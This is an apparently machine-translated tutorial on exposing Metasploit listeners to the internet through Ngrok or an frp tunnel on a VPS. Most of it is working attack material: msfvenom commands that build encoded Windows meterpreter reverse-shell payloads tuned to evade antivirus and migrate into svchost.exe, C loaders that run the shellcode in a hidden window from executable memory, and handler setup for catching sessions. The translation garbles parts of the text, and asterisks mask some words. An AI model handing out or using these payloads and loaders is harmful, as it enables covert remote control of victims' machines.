0x01. Foreword
In the *** test link, MSF can be said to be one of the old-fashioned tools. Sometimes the MSF of the intranet cannot meet our needs. At this time, we need to use some methods for port forwarding. , Here is a brief introduction on how to forward the MSF in the internal network to the public network.
0x02. Two common forwarding
methods ①: Use Ngrok intranet mapping
First, we need to have an account on the Ngrok official website, the official website address: https://ngrok.com/, after registration, first download a Ngrok software, download address: https://ngrok.com/download
After the download is complete, copy the software to kali, decompress it and execute the command in the figure below (ngrok official website will assign you a key)
ngrok
ngrok times
The next step is very simple. If you want to forward the local http service to the public network, you can execute the following command, and then forward the http service to the ngrok domain name of the public network
./ngrok http 80
ngrok1
www
ok, after trying http, let's forward tcp
./ngrok tcp 8888
tcp
Next, we use msf to generate a *** test
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=***machine IP LPORT=***machine port -e x86/shikata_ga_nai -b'\x00\x0a\xff' -i 15 -f exe -o payload.exe
here briefly talk about the parameters of ***:
-p select the specified payload
-E Choose to develop an encoder (different encoders have different anti-kill effects, and some encoders have significant anti-soft effects such as tinder)
-i encoding times
-b Go to extra/bad characters, lhost is the address of the ngrok server you applied for and lport is a custom remote port
-f generates the specified format
-a Select the architecture platform, including x86 | x64 | x86_64
--Platform select system type
Of course, you can also generate c shellcode
msfvenom -a x86 --platform Windows -p windows / meterpreter / reverse_tcp LHOST = *** Desk IP LPORT = *** Desk edge -e x86 / shikata_ga_nai -b'\ x00 \ x0a \ xff' -i 15 -fc
shellcode
Use VC++6.0 to compile the following code
#include <stdio.h>
#pragmacomment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"")//Do not display window during runtime
unsignedchar buf[] =
"Buf array";//Paste the copied array here
main()
{
((void(*)(void))&buf)();
}
Back to the topic, use msf monitoring module to monitor
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8888
exploit
meterpreter to get the session
msf
Method ②: Use frp+vps intranet mapping
First, you need to go to gihub to download frp: https://github.com/fatedier/frp/releases Here I downloaded the version of linux 64 (because the server is linux), after downloading, put it on the local kali and server respectively, after decompression, then To configure separately:
Server configuration frps.ini file:
bind_addr = 0.0.0.0 // Fill in 0.0.0.0 to mean the machine ip
bind_port = 6531 //frp connection port
dashboard_addr = 0.0.0.0 // Fill in 0.0.0.0 to mean the machine ip
dashboard_port = 7500 //Webpage Access port
dashboard_user = admin //User name
dashboard_pwd = crlf //Password
token = crlf //
After the frp connection password is configured, start the server
Method One: ./ frps - c frps.ini // reception starts, you can see detailed listening xinxi
Method Two: nohup ./frps -c frps.ini> log.txt & // backstage start
frp
After successful startup, you can view it through the web page
web
Next, configure the frpc.ini of the client kali
[common]
server_addr = 66.23.xx //vps ip
server_port = 6531 //port to
connect to frp token = crlf //to connect to
frp password [msf]
type = tcp //tcp protocol
local_ip = 127.0.0.1 //fill in 127.0. 0.1 is sufficient
local_port = 6759 //
Remote port forwarded to vps remote_port = 6000 //Access port
operation./frpc -c frpc.ini
frp_c
ok, then use the msfvenom above to generate the test***
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=***machine IP LPORT=***machine port -e x86/shikata_ga_nai -b'\x00\x0a\xff' -i 15 -f exe -o payload.exe
can also use shellcode
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=remote server ip
LPORT=remote server port -e x86/shikata_ga_nai -i 15 -b'x00' PrependMigrate=true PrependMigrateProc=svchost.exe -fc > shellcode.c
PrependMigrate=true, PrependMigrateProc=svchost.exe so that the *** program will be migrated to the svchost.exe process
You can also use the payload of windows/meterpreter/reverse_tcp_rc4 to encrypt sessions and increase anti-virus capabilities
Use vc++6.0 to create a 32-bit project and compile
#include<stdio.h>
#include<windows.h>
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"") //Remove the window
unsigned char shellcode[]=
" Place the generated shellcode"
void main()
{
LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, shellcode, sizeof(shellcode));
((void(*)())Memory)( );
}
Finally start msf, waiting to go online
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6759 // Native forwarding port